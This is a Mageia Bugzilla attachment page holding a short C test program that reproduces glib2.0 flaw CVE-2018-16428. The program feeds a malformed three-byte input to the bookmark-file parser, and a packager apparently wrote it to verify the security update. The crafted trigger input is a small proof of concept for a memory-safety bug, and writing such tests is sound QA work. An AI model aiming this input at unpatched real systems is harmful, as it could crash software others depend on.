Mageia Bugzilla – Attachment 10406 Details for
Bug 23665
glib2.0 new security issues CVE-2018-16428 and CVE-2018-16429
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
New Account
|
Forgot Password
Test script for CVE-2018-16428
current_element.c (text/x-csrc), 369 bytes, created by
Len Lawrence
on 2018-10-17 16:29:58 CEST
(
hide
)
Description:
Test script for CVE-2018-16428
Filename:
MIME Type:
Creator:
Len Lawrence
Created:
2018-10-17 16:29:58 CEST
Size:
369 bytes
patch
obsolete
>#include <stdio.h> >#include <string.h> >#include <glib.h> >#include <stdlib.h> >//#include <gbase64.h> > > >int main(int argc, void* argv[]) >{ > > > char data[3] = {0x3c, 0x2f, 0xea}; > GBookmarkFile * bookmark = g_bookmark_file_new (); > g_bookmark_file_load_from_data (bookmark, (const gchar*)data, 3, NULL); > g_bookmark_file_free (bookmark); > > return 0; >}
#include <stdio.h> #include <string.h> #include <glib.h> #include <stdlib.h> //#include <gbase64.h> int main(int argc, void* argv[]) { char data[3] = {0x3c, 0x2f, 0xea}; GBookmarkFile * bookmark = g_bookmark_file_new (); g_bookmark_file_load_from_data (bookmark, (const gchar*)data, 3, NULL); g_bookmark_file_free (bookmark); return 0; }
View Attachment As Raw
Actions:
View
Attachments on
bug 23665
: 10406 |
10407
|
10408